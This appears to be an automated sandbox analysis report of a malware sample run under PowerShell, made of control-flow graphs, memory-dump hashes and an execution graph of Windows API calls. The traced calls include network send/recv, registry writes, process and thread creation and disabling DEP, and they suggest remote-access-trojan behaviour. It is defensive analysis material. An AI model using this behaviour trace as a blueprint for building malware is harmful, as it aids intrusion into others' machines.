                                                                                                            control_flow_graph 1490 73813a0-73813c6 1492 73813cc-73813d1 1490->1492 1493 7381572-7381596 1490->1493 1494 73813e9-73813ed 1492->1494 1495 73813d3-73813d9 1492->1495 1501 7381598-738159b 1493->1501 1502 738159c-73815ba 1493->1502 1497 738151e-7381528 1494->1497 1498 73813f3-73813f5 1494->1498 1499 73813db 1495->1499 1500 73813dd-73813e7 1495->1500 1505 738152a-7381533 1497->1505 1506 7381536-738153c 1497->1506 1503 7381405 1498->1503 1504 73813f7-7381403 1498->1504 1499->1494 1500->1494 1501->1502 1510 73816ec-7381708 1502->1510 1511 73815c0-73815c5 1502->1511 1507 7381407-7381409 1503->1507 1504->1507 1508 738153e-7381540 1506->1508 1509 7381542-738154e 1506->1509 1507->1497 1515 738140f-7381413 1507->1515 1516 7381550-738156f 1508->1516 1509->1516 1528 738170a-738171d 1510->1528 1529 73816a3-73816a8 1510->1529 1513 73815dd-73815e1 1511->1513 1514 73815c7-73815cd 1511->1514 1519 738169e-73816a2 1513->1519 1520 73815e7-73815e9 1513->1520 1517 73815cf 1514->1517 1518 73815d1-73815db 1514->1518 1521 7381415-7381424 1515->1521 1522 7381426 1515->1522 1517->1513 1518->1513 1519->1529 1525 73815f9 1520->1525 1526 73815eb-73815f7 1520->1526 1527 7381428-738142a 1521->1527 1522->1527 1531 73815fb-73815fd 1525->1531 1526->1531 1527->1497 1533 7381430-7381432 1527->1533 1534 738172d 1528->1534 1535 738171f-738172b 1528->1535 1536 73816aa-73816b2 1529->1536 1537 73816b5-73816bb 1529->1537 1531->1519 1538 7381603-7381605 1531->1538 1539 7381442 1533->1539 1540 7381434-7381440 1533->1540 1541 738172f-7381731 1534->1541 1535->1541 1542 73816bd-73816bf 1537->1542 1543 73816c1-73816cd 1537->1543 1545 738161f-7381621 1538->1545 1546 7381607-738160d 1538->1546 1547 7381444-7381446 1539->1547 1540->1547 1548 738179f-73817a9 1541->1548 1549 7381733-7381752 1541->1549 1550 73816cf-73816e9 1542->1550 1543->1550 1558 7381628-738162a 1545->1558 1551 738160f 1546->1551 1552 7381611-738161d 1546->1552 1547->1497 1555 738144c-738144e 1547->1555 1553 73817ab-73817af 1548->1553 1554 73817b2-73817b8 1548->1554 1580 7381762 1549->1580 1581 7381754-7381760 1549->1581 1551->1545 1552->1545 1559 73817ba-73817bc 1554->1559 1560 73817be-73817ca 1554->1560 1561 7381468-7381473 1555->1561 1562 7381450-7381456 1555->1562 1567 738162c-7381632 1558->1567 1568 7381642-738169b 1558->1568 1569 73817cc-73817ea 1559->1569 1560->1569 1565 7381482-738148e 1561->1565 1566 7381475-7381478 1561->1566 1570 7381458 1562->1570 1571 738145a-7381466 1562->1571 1574 738149c-73814a3 1565->1574 1575 7381490-7381492 1565->1575 1566->1565 1576 7381634 1567->1576 1577 7381636-7381638 1567->1577 1570->1561 1571->1561 1585 73814aa-73814ac 1574->1585 1575->1574 1576->1568 1577->1568 1584 7381764-7381766 1580->1584 1581->1584 1584->1548 1586 7381768-7381785 1584->1586 1588 73814ae-73814b4 1585->1588 1589 73814c4-738151b 1585->1589 1595 73817ed-73817f2 1586->1595 1596 7381787-7381799 1586->1596 1592 73814b8-73814ba 1588->1592 1593 73814b6 1588->1593 1592->1589 1593->1589 1595->1596 1596->1548
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.2522270871.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_7380000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 17ae2155e12aa4da10b19ed1adea0be6d18b42c0eb3003ec6215a489cbb322ac
                                                                                                            • Instruction ID: ea928092314ec1d4e5b1e4f8abe8f23a378f9ef61e6464c54535d377bcd74f94
                                                                                                            • Opcode Fuzzy Hash: 17ae2155e12aa4da10b19ed1adea0be6d18b42c0eb3003ec6215a489cbb322ac
                                                                                                            • Instruction Fuzzy Hash: 36B107F570035ADFEB656B69C800666BBB6AFC2211F28807FD84DCB651DB31C942C762
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.2522270871.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_7380000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a1d888478827036ef41ce0f96fe93e669d7efbe109432a8e8bc27faf8a97294f
                                                                                                            • Instruction ID: 33f71437a5f746a6aff7d3a0ed045e19f50ca2fa3baeb8ca6ea79aeaa8bf4313
                                                                                                            • Opcode Fuzzy Hash: a1d888478827036ef41ce0f96fe93e669d7efbe109432a8e8bc27faf8a97294f
                                                                                                            • Instruction Fuzzy Hash: 2C3124F0604346DFFBA9AB34C51176A7BA5AF81604F1480BAD809DF292E739C948C772
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.2522270871.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_7380000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ea5bfd015dc65b098d0337877d60c0a374931bf11c44a515128f6e0061efb4ae
                                                                                                            • Instruction ID: 4dd01498479aa9f33111d05b17c0a9a18882d295430fd4311c4be14382a953ad
                                                                                                            • Opcode Fuzzy Hash: ea5bfd015dc65b098d0337877d60c0a374931bf11c44a515128f6e0061efb4ae
                                                                                                            • Instruction Fuzzy Hash: 7831F8F050435EDFEBA59F29C5406657BB9EF42211F2D41AFD80C8B155E335C942CB61
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.2522270871.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_7380000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 875df0e42896d03f1dc3a8276a044631d775e22d167febe01b4caf45646741a4
                                                                                                            • Instruction ID: e80b36c3ee5970c46f563785284378c55ad28cf8ddce4f26447e228a870c95ff
                                                                                                            • Opcode Fuzzy Hash: 875df0e42896d03f1dc3a8276a044631d775e22d167febe01b4caf45646741a4
                                                                                                            • Instruction Fuzzy Hash: 67312BF0A0634ADFEB91EF25C400A6A7BF1BF41214F1581ABD41CCB252D735C885CB92
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.2522270871.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_7380000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 17f68cfd7c0ca15fc136b5bb5855d3e52f0e924d70131141d3ad614f4b9e6049
                                                                                                            • Instruction ID: 2e02b500f9131b5da27f8ba8e876f611f8126acd2e0c963f44a9b66ed7403cf3
                                                                                                            • Opcode Fuzzy Hash: 17f68cfd7c0ca15fc136b5bb5855d3e52f0e924d70131141d3ad614f4b9e6049
                                                                                                            • Instruction Fuzzy Hash: 1F118CF0A0430ECFFBA1AE198500676BBB9AB81310F1841BEC88D97145E7319692CB92
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.2486713103.0000000002D3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D3D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_2d3d000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a021405ccc292cb0545f71b14f148c05201ecf7b90040ee0df186f53d9d77ce7
                                                                                                            • Instruction ID: 99fdafb2c13945a6ab631a0a28187cbacf8505c8dfc391d26e81327219ff8b72
                                                                                                            • Opcode Fuzzy Hash: a021405ccc292cb0545f71b14f148c05201ecf7b90040ee0df186f53d9d77ce7
                                                                                                            • Instruction Fuzzy Hash: 6001F2724083409AE7224E25CD80B66BF98DF41B24F28C01AED480B342C7B89C41CEB1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.2486713103.0000000002D3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D3D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_2d3d000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d5e1333e68d77dd8e14bfbce2cb9622ef3bec468fbd1392040eb080bbbd1ad3b
                                                                                                            • Instruction ID: d98e472d8f2d2226497ca0a92f147c8bf0c5b69b9ef454486237e9f97abf2d59
                                                                                                            • Opcode Fuzzy Hash: d5e1333e68d77dd8e14bfbce2cb9622ef3bec468fbd1392040eb080bbbd1ad3b
                                                                                                            • Instruction Fuzzy Hash: 5D014C6240E3C09EE7138B25CD94B52BFB4DF47624F1D81DBD9888F2A3C2695849CB72
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.2487341851.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_2e10000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f6ffadfb771d09e1e88b0db4910af7c4d826196edde7c371d1443a4e7230a776
                                                                                                            • Instruction ID: 836182d7aaa8df35d633d75b77859c70161d1b7bcc9e9c996637a147e66b50c1
                                                                                                            • Opcode Fuzzy Hash: f6ffadfb771d09e1e88b0db4910af7c4d826196edde7c371d1443a4e7230a776
                                                                                                            • Instruction Fuzzy Hash: 96D1B134F442598BDB189B7898646BE7BB6BFC4708F04D57EE442E7688DF349C0287A1

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:2.9%
                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                            Signature Coverage:6.1%
                                                                                                            Total number of Nodes:981
                                                                                                            Total number of Limit Nodes:46
                                                                                                            execution_graph 46123 41d4d0 46124 41d4e6 _Yarn ___scrt_fastfail 46123->46124 46126 431f99 21 API calls 46124->46126 46138 41d6e3 46124->46138 46129 41d696 ___scrt_fastfail 46126->46129 46127 41d6f4 46128 41d734 46127->46128 46136 41d760 46127->46136 46140 431f99 46127->46140 46129->46128 46131 431f99 21 API calls 46129->46131 46134 41d6be ___scrt_fastfail 46131->46134 46133 41d72d ___scrt_fastfail 46133->46128 46145 43264f 46133->46145 46134->46128 46137 431f99 21 API calls 46134->46137 46136->46128 46148 41d474 21 API calls ___scrt_fastfail 46136->46148 46137->46138 46138->46128 46139 41d071 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_fastfail 46138->46139 46139->46127 46141 431fa3 46140->46141 46142 431fa7 46140->46142 46141->46133 46149 43a88c 46142->46149 46158 43256f 46145->46158 46147 432657 46147->46136 46148->46128 46154 446aff _strftime 46149->46154 46150 446b3d 46157 445354 20 API calls __dosmaperr 46150->46157 46152 446b28 RtlAllocateHeap 46153 431fac 46152->46153 46152->46154 46153->46133 46154->46150 46154->46152 46156 442200 7 API calls 2 library calls 46154->46156 46156->46154 46157->46153 46159 432588 46158->46159 46163 43257e 46158->46163 46160 431f99 21 API calls 46159->46160 46159->46163 46161 4325a9 46160->46161 46161->46163 46164 43293a CryptAcquireContextA 46161->46164 46163->46147 46165 432956 46164->46165 46166 43295b CryptGenRandom 46164->46166 46165->46163 46166->46165 46167 432970 CryptReleaseContext 46166->46167 46167->46165 46168 426030 46173 4260f7 recv 46168->46173 46174 44e8b6 46175 44e8c1 46174->46175 46176 44e8e9 46175->46176 46177 44e8da 46175->46177 46181 44e8f8 46176->46181 46196 455573 27 API calls 2 library calls 46176->46196 46195 445354 20 API calls __dosmaperr 46177->46195 46183 44b9be 46181->46183 46182 44e8df ___scrt_fastfail 46184 44b9d6 46183->46184 46185 44b9cb 46183->46185 46187 44b9de 46184->46187 46193 44b9e7 _strftime 46184->46193 46197 446aff 21 API calls 3 library calls 46185->46197 46198 446ac5 20 API calls __dosmaperr 46187->46198 46188 44ba11 RtlReAllocateHeap 46192 44b9d3 46188->46192 46188->46193 46189 44b9ec 46199 445354 20 API calls __dosmaperr 46189->46199 46192->46182 46193->46188 46193->46189 46200 442200 7 API calls 2 library calls 46193->46200 46195->46182 46196->46181 46197->46192 46198->46192 46199->46192 46200->46193 46201 426091 46206 42610e send 46201->46206 46207 43a998 46210 43a9a4 _swprintf ___scrt_is_nonwritable_in_current_image 46207->46210 46208 43a9b2 46225 445354 20 API calls __dosmaperr 46208->46225 46210->46208 46213 43a9dc 46210->46213 46211 43a9b7 46226 43a827 26 API calls _Deallocate 46211->46226 46220 444acc EnterCriticalSection 46213->46220 46215 43a9e7 46221 43aa88 46215->46221 46218 43a9c2 std::_Locinfo::_Locinfo_dtor 46220->46215 46222 43aa96 46221->46222 46224 43a9f2 46222->46224 46228 448416 39 API calls 2 library calls 46222->46228 46227 43aa0f LeaveCriticalSection std::_Lockit::~_Lockit 46224->46227 46225->46211 46226->46218 46227->46218 46228->46222 46229 4339be 46230 4339ca ___scrt_is_nonwritable_in_current_image 46229->46230 46261 4336b3 46230->46261 46232 4339d1 46233 433b24 46232->46233 46236 4339fb 46232->46236 46561 433b44 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 46233->46561 46235 433b2b 46562 4426be 28 API calls _Atexit 46235->46562 46248 433a3a ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 46236->46248 46555 4434d1 5 API calls CatchGuardHandler 46236->46555 46238 433b31 46563 442670 28 API calls _Atexit 46238->46563 46241 433a14 46243 433a1a 46241->46243 46556 443475 5 API calls CatchGuardHandler 46241->46556 46242 433b39 46245 433a9b 46272 433c5e 46245->46272 46248->46245 46557 43edf4 38 API calls 4 library calls 46248->46557 46255 433abd 46255->46235 46256 433ac1 46255->46256 46257 433aca 46256->46257 46559 442661 28 API calls _Atexit 46256->46559 46560 433842 13 API calls 2 library calls 46257->46560 46260 433ad2 46260->46243 46262 4336bc 46261->46262 46564 433e0a IsProcessorFeaturePresent 46262->46564 46264 4336c8 46565 4379ee 10 API calls 3 library calls 46264->46565 46266 4336cd 46271 4336d1 46266->46271 46566 44335e IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 46266->46566 46268 4336da 46269 4336e8 46268->46269 46567 437a17 8 API calls 3 library calls 46268->46567 46269->46232 46271->46232 46568 436050 46272->46568 46275 433aa1 46276 443422 46275->46276 46570 44ddc9 46276->46570 46278 433aaa 46281 40d767 46278->46281 46279 44342b 46279->46278 46574 44e0d3 38 API calls 46279->46574 46576 41bce3 LoadLibraryA GetProcAddress 46281->46576 46283 40d783 GetModuleFileNameW 46581 40e168 46283->46581 46285 40d79f 46596 401fbd 46285->46596 46288 401fbd 28 API calls 46289 40d7bd 46288->46289 46600 41afc3 46289->46600 46293 40d7cf 46625 401d8c 46293->46625 46295 40d7d8 46296 40d835 46295->46296 46297 40d7eb 46295->46297 46631 401d64 46296->46631 46882 40e986 111 API calls 46297->46882 46300 40d845 46303 401d64 28 API calls 46300->46303 46301 40d7fd 46302 401d64 28 API calls 46301->46302 46306 40d809 46302->46306 46304 40d864 46303->46304 46636 404cbf 46304->46636 46883 40e937 68 API calls 46306->46883 46307 40d873 46640 405ce6 46307->46640 46310 40d824 46884 40e155 68 API calls 46310->46884 46311 40d87f 46643 401eef 46311->46643 46314 40d88b 46647 401eea 46314->46647 46316 40d894 46318 401eea 26 API calls 46316->46318 46317 401eea 26 API calls 46319 40dc9f 46317->46319 46320 40d89d 46318->46320 46558 433c94 GetModuleHandleW 46319->46558 46321 401d64 28 API calls 46320->46321 46322 40d8a6 46321->46322 46651 401ebd 46322->46651 46324 40d8b1 46325 401d64 28 API calls 46324->46325 46326 40d8ca 46325->46326 46327 401d64 28 API calls 46326->46327 46329 40d8e5 46327->46329 46328 40d946 46331 401d64 28 API calls 46328->46331 46346 40e134 46328->46346 46329->46328 46885 4085b4 46329->46885 46336 40d95d 46331->46336 46332 40d912 46333 401eef 26 API calls 46332->46333 46334 40d91e 46333->46334 46337 401eea 26 API calls 46334->46337 46335 40d9a4 46655 40bed7 46335->46655 46336->46335 46342 4124b7 3 API calls 46336->46342 46338 40d927 46337->46338 46889 4124b7 RegOpenKeyExA 46338->46889 46340 40d9aa 46341 40d82d 46340->46341 46658 41a463 46340->46658 46341->46317 46347 40d988 46342->46347 46345 40d9c5 46348 40da18 46345->46348 46675 40697b 46345->46675 46965 412902 30 API calls 46346->46965 46347->46335 46892 412902 30 API calls 46347->46892 46350 401d64 28 API calls 46348->46350 46353 40da21 46350->46353 46362 40da32 46353->46362 46363 40da2d 46353->46363 46355 40e14a 46966 4112b5 64 API calls ___scrt_fastfail 46355->46966 46357 40d9e4 46893 40699d 30 API calls 46357->46893 46358 40d9ee 46360 401d64 28 API calls 46358->46360 46370 40d9f7 46360->46370 46367 401d64 28 API calls 46362->46367 46896 4069ba CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 46363->46896 46364 40d9e9 46894 4064d0 97 API calls 46364->46894 46368 40da3b 46367->46368 46679 41ae08 46368->46679 46370->46348 46373 40da13 46370->46373 46371 40da46 46683 401e18 46371->46683 46895 4064d0 97 API calls 46373->46895 46374 40da51 46687 401e13 46374->46687 46377 40da5a 46378 401d64 28 API calls 46377->46378 46379 40da63 46378->46379 46380 401d64 28 API calls 46379->46380 46381 40da7d 46380->46381 46382 401d64 28 API calls 46381->46382 46383 40da97 46382->46383 46384 401d64 28 API calls 46383->46384 46386 40dab0 46384->46386 46385 40db1d 46387 40db2c 46385->46387 46394 40dcaa ___scrt_fastfail 46385->46394 46386->46385 46388 401d64 28 API calls 46386->46388 46389 40db35 46387->46389 46417 40dbb1 ___scrt_fastfail 46387->46417 46392 40dac5 _wcslen 46388->46392 46390 401d64 28 API calls 46389->46390 46391 40db3e 46390->46391 46393 401d64 28 API calls 46391->46393 46392->46385 46395 401d64 28 API calls 46392->46395 46396 40db50 46393->46396 46956 41265d RegOpenKeyExA RegQueryValueExA RegCloseKey 46394->46956 46397 40dae0 46395->46397 46399 401d64 28 API calls 46396->46399 46400 401d64 28 API calls 46397->46400 46401 40db62 46399->46401 46402 40daf5 46400->46402 46404 401d64 28 API calls 46401->46404 46897 40c89e 46402->46897 46403 40dcef 46405 401d64 28 API calls 46403->46405 46406 40db8b 46404->46406 46407 40dd16 46405->46407 46411 401d64 28 API calls 46406->46411 46701 401f66 46407->46701 46410 401e18 26 API calls 46413 40db14 46410->46413 46414 40db9c 46411->46414 46416 401e13 26 API calls 46413->46416 46954 40bc67 45 API calls _wcslen 46414->46954 46415 40dd25 46705 4126d2 RegCreateKeyA 46415->46705 46416->46385 46691 4128a2 46417->46691 46421 40dc45 ctype 46426 401d64 28 API calls 46421->46426 46422 40dbac 46422->46417 46424 401d64 28 API calls 46425 40dd47 46424->46425 46711 43a5e7 46425->46711 46427 40dc5c 46426->46427 46427->46403 46431 40dc70 46427->46431 46430 40dd5e 46957 41beb0 86 API calls ___scrt_fastfail 46430->46957 46433 401d64 28 API calls 46431->46433 46432 40dd81 46437 401f66 28 API calls 46432->46437 46435 40dc7e 46433->46435 46438 41ae08 28 API calls 46435->46438 46436 40dd65 CreateThread 46436->46432 47353 41c96f 10 API calls 46436->47353 46439 40dd96 46437->46439 46440 40dc87 46438->46440 46441 401f66 28 API calls 46439->46441 46955 40e219 109 API calls 46440->46955 46444 40dda5 46441->46444 46443 40dc8c 46443->46403 46446 40dc93 46443->46446 46715 41a686 46444->46715 46446->46341 46448 401d64 28 API calls 46449 40ddb6 46448->46449 46450 401d64 28 API calls 46449->46450 46451 40ddcb 46450->46451 46452 401d64 28 API calls 46451->46452 46453 40ddeb 46452->46453 46454 43a5e7 _strftime 42 API calls 46453->46454 46455 40ddf8 46454->46455 46456 401d64 28 API calls 46455->46456 46457 40de03 46456->46457 46458 401d64 28 API calls 46457->46458 46459 40de14 46458->46459 46460 401d64 28 API calls 46459->46460 46461 40de29 46460->46461 46462 401d64 28 API calls 46461->46462 46463 40de3a 46462->46463 46464 40de41 StrToIntA 46463->46464 46739 409517 46464->46739 46467 401d64 28 API calls 46468 40de5c 46467->46468 46469 40dea1 46468->46469 46470 40de68 46468->46470 46473 401d64 28 API calls 46469->46473 46958 43360d 22 API calls 3 library calls 46470->46958 46472 40de71 46475 401d64 28 API calls 46472->46475 46474 40deb1 46473->46474 46477 40def9 46474->46477 46478 40debd 46474->46478 46476 40de84 46475->46476 46479 40de8b CreateThread 46476->46479 46481 401d64 28 API calls 46477->46481 46959 43360d 22 API calls 3 library calls 46478->46959 46479->46469 47357 419128 102 API calls 2 library calls 46479->47357 46483 40df02 46481->46483 46482 40dec6 46484 401d64 28 API calls 46482->46484 46486 40df6c 46483->46486 46487 40df0e 46483->46487 46485 40ded8 46484->46485 46489 40dedf CreateThread 46485->46489 46490 401d64 28 API calls 46486->46490 46488 401d64 28 API calls 46487->46488 46492 40df1e 46488->46492 46489->46477 47356 419128 102 API calls 2 library calls 46489->47356 46491 40df75 46490->46491 46493 40df81 46491->46493 46494 40dfba 46491->46494 46495 401d64 28 API calls 46492->46495 46497 401d64 28 API calls 46493->46497 46764 41a7a2 GetComputerNameExW GetUserNameW 46494->46764 46498 40df33 46495->46498 46500 40df8a 46497->46500 46960 40c854 31 API calls 46498->46960 46505 401d64 28 API calls 46500->46505 46501 401e18 26 API calls 46502 40dfce 46501->46502 46504 401e13 26 API calls 46502->46504 46507 40dfd7 46504->46507 46508 40df9f 46505->46508 46506 40df46 46509 401e18 26 API calls 46506->46509 46510 40dfe0 SetProcessDEPPolicy 46507->46510 46511 40dfe3 CreateThread 46507->46511 46518 43a5e7 _strftime 42 API calls 46508->46518 46512 40df52 46509->46512 46510->46511 46513 40e004 46511->46513 46514 40dff8 CreateThread 46511->46514 47325 40e54f 46511->47325 46515 401e13 26 API calls 46512->46515 46516 40e019 46513->46516 46517 40e00d CreateThread 46513->46517 46514->46513 47352 410f36 136 API calls 46514->47352 46519 40df5b CreateThread 46515->46519 46521 40e073 46516->46521 46523 401f66 28 API calls 46516->46523 46517->46516 47354 411524 38 API calls ___scrt_fastfail 46517->47354 46520 40dfac 46518->46520 46519->46486 47355 40196b 49 API calls _strftime 46519->47355 46961 40b95c 7 API calls 46520->46961 46775 41246e RegOpenKeyExA 46521->46775 46524 40e046 46523->46524 46962 404c9e 28 API calls 46524->46962 46527 40e053 46529 401f66 28 API calls 46527->46529 46531 40e062 46529->46531 46530 40e12a 46787 40cbac 46530->46787 46535 41a686 79 API calls 46531->46535 46533 41ae08 28 API calls 46534 40e0a4 46533->46534 46778 412584 RegOpenKeyExW 46534->46778 46537 40e067 46535->46537 46539 401eea 26 API calls 46537->46539 46539->46521 46542 401e13 26 API calls 46545 40e0c5 46542->46545 46543 40e0ed DeleteFileW 46544 40e0f4 46543->46544 46543->46545 46547 41ae08 28 API calls 46544->46547 46545->46543 46545->46544 46546 40e0db Sleep 46545->46546 46963 401e07 46546->46963 46549 40e104 46547->46549 46783 41297a RegOpenKeyExW 46549->46783 46551 40e117 46552 401e13 26 API calls 46551->46552 46553 40e121 46552->46553 46554 401e13 26 API calls 46553->46554 46554->46530 46555->46241 46556->46248 46557->46245 46558->46255 46559->46257 46560->46260 46561->46235 46562->46238 46563->46242 46564->46264 46565->46266 46566->46268 46567->46271 46569 433c71 GetStartupInfoW 46568->46569 46569->46275 46571 44dddb 46570->46571 46572 44ddd2 46570->46572 46571->46279 46575 44dcc8 51 API calls 5 library calls 46572->46575 46574->46279 46575->46571 46577 41bd22 LoadLibraryA GetProcAddress 46576->46577 46578 41bd12 GetModuleHandleA GetProcAddress 46576->46578 46579 41bd4b 32 API calls 46577->46579 46580 41bd3b LoadLibraryA GetProcAddress 46577->46580 46578->46577 46579->46283 46580->46579 46967 41a63f FindResourceA 46581->46967 46584 43a88c _Yarn 21 API calls 46585 40e192 _Yarn 46584->46585 46970 401f86 46585->46970 46588 401eef 26 API calls 46589 40e1b8 46588->46589 46590 401eea 26 API calls 46589->46590 46591 40e1c1 46590->46591 46592 43a88c _Yarn 21 API calls 46591->46592 46593 40e1d2 _Yarn 46592->46593 46974 406052 46593->46974 46595 40e205 46595->46285 46597 401fcc 46596->46597 46982 402501 46597->46982 46599 401fea 46599->46288 46613 41afd6 46600->46613 46601 401eea 26 API calls 46602 41b078 46601->46602 46603 401eea 26 API calls 46602->46603 46605 41b080 46603->46605 46604 41b048 46989 403b60 28 API calls 46604->46989 46608 401eea 26 API calls 46605->46608 46611 40d7c6 46608->46611 46609 41b054 46612 401eef 26 API calls 46609->46612 46610 401eef 26 API calls 46610->46613 46621 40e8bd 46611->46621 46614 41b05d 46612->46614 46613->46604 46613->46610 46616 401eea 26 API calls 46613->46616 46620 41b046 46613->46620 46987 403b60 28 API calls 46613->46987 46988 41bfa9 28 API calls 46613->46988 46615 401eea 26 API calls 46614->46615 46617 41b065 46615->46617 46616->46613 46990 41bfa9 28 API calls 46617->46990 46620->46601 46622 40e8ca 46621->46622 46624 40e8da 46622->46624 46991 40200a 26 API calls 46622->46991 46624->46293 46626 40200a 46625->46626 46630 40203a 46626->46630 46992 402654 26 API calls 46626->46992 46628 40202b 46993 4026ba 26 API calls _Deallocate 46628->46993 46630->46295 46632 401d6c 46631->46632 46633 401d74 46632->46633 46994 401fff 28 API calls 46632->46994 46633->46300 46637 404ccb 46636->46637 46995 402e78 46637->46995 46639 404cee 46639->46307 47004 404bc4 46640->47004 46642 405cf4 46642->46311 46644 401efe 46643->46644 46646 401f0a 46644->46646 47013 4021b9 26 API calls 46644->47013 46646->46314 46649 4021b9 46647->46649 46648 4021e8 46648->46316 46649->46648 47014 40262e 26 API calls _Deallocate 46649->47014 46653 401ec9 46651->46653 46652 401ee4 46652->46324 46653->46652 46654 402325 28 API calls 46653->46654 46654->46652 47015 401e8f 46655->47015 46657 40bee1 CreateMutexA GetLastError 46657->46340 47017 41b15b 46658->47017 46663 401eef 26 API calls 46664 41a49f 46663->46664 46665 401eea 26 API calls 46664->46665 46666 41a4a7 46665->46666 46667 41a4fa 46666->46667 46668 412513 31 API calls 46666->46668 46667->46345 46669 41a4cd 46668->46669 46670 41a4d8 StrToIntA 46669->46670 46671 41a4ef 46670->46671 46672 41a4e6 46670->46672 46673 401eea 26 API calls 46671->46673 47025 41c102 28 API calls 46672->47025 46673->46667 46676 40698f 46675->46676 46677 4124b7 3 API calls 46676->46677 46678 406996 46677->46678 46678->46357 46678->46358 46680 41ae1c 46679->46680 47026 40b027 46680->47026 46682 41ae24 46682->46371 46684 401e27 46683->46684 46686 401e33 46684->46686 47035 402121 26 API calls 46684->47035 46686->46374 46689 402121 46687->46689 46688 402150 46688->46377 46689->46688 47036 402718 26 API calls _Deallocate 46689->47036 46692 4128c0 46691->46692 46693 406052 28 API calls 46692->46693 46694 4128d5 46693->46694 46695 401fbd 28 API calls 46694->46695 46696 4128e5 46695->46696 46697 4126d2 29 API calls 46696->46697 46698 4128ef 46697->46698 46699 401eea 26 API calls 46698->46699 46700 4128fc 46699->46700 46700->46421 46702 401f6e 46701->46702 47037 402301 46702->47037 46706 412722 46705->46706 46708 4126eb 46705->46708 46707 401eea 26 API calls 46706->46707 46709 40dd3b 46707->46709 46710 4126fd RegSetValueExA RegCloseKey 46708->46710 46709->46424 46710->46706 46712 43a600 _strftime 46711->46712 47041 43993e 46712->47041 46716 41a737 46715->46716 46717 41a69c GetLocalTime 46715->46717 46719 401eea 26 API calls 46716->46719 46718 404cbf 28 API calls 46717->46718 46720 41a6de 46718->46720 46721 41a73f 46719->46721 46723 405ce6 28 API calls 46720->46723 46722 401eea 26 API calls 46721->46722 46724 40ddaa 46722->46724 46725 41a6ea 46723->46725 46724->46448 47075 4027cb 46725->47075 46727 41a6f6 46728 405ce6 28 API calls 46727->46728 46729 41a702 46728->46729 47078 406478 76 API calls 46729->47078 46731 41a710 46732 401eea 26 API calls 46731->46732 46733 41a71c 46732->46733 46734 401eea 26 API calls 46733->46734 46735 41a725 46734->46735 46736 401eea 26 API calls 46735->46736 46737 41a72e 46736->46737 46738 401eea 26 API calls 46737->46738 46738->46716 46740 409536 _wcslen 46739->46740 46741 409541 46740->46741 46742 409558 46740->46742 46743 40c89e 31 API calls 46741->46743 46744 40c89e 31 API calls 46742->46744 46745 409549 46743->46745 46746 409560 46744->46746 46747 401e18 26 API calls 46745->46747 46748 401e18 26 API calls 46746->46748 46763 409553 46747->46763 46749 40956e 46748->46749 46750 401e13 26 API calls 46749->46750 46752 409576 46750->46752 46751 401e13 26 API calls 46753 4095ad 46751->46753 47098 40856b 28 API calls 46752->47098 47083 409837 46753->47083 46755 409588 47099 4028cf 46755->47099 46759 409593 46760 401e18 26 API calls 46759->46760 46761 40959d 46760->46761 46762 401e13 26 API calls 46761->46762 46762->46763 46763->46751 47118 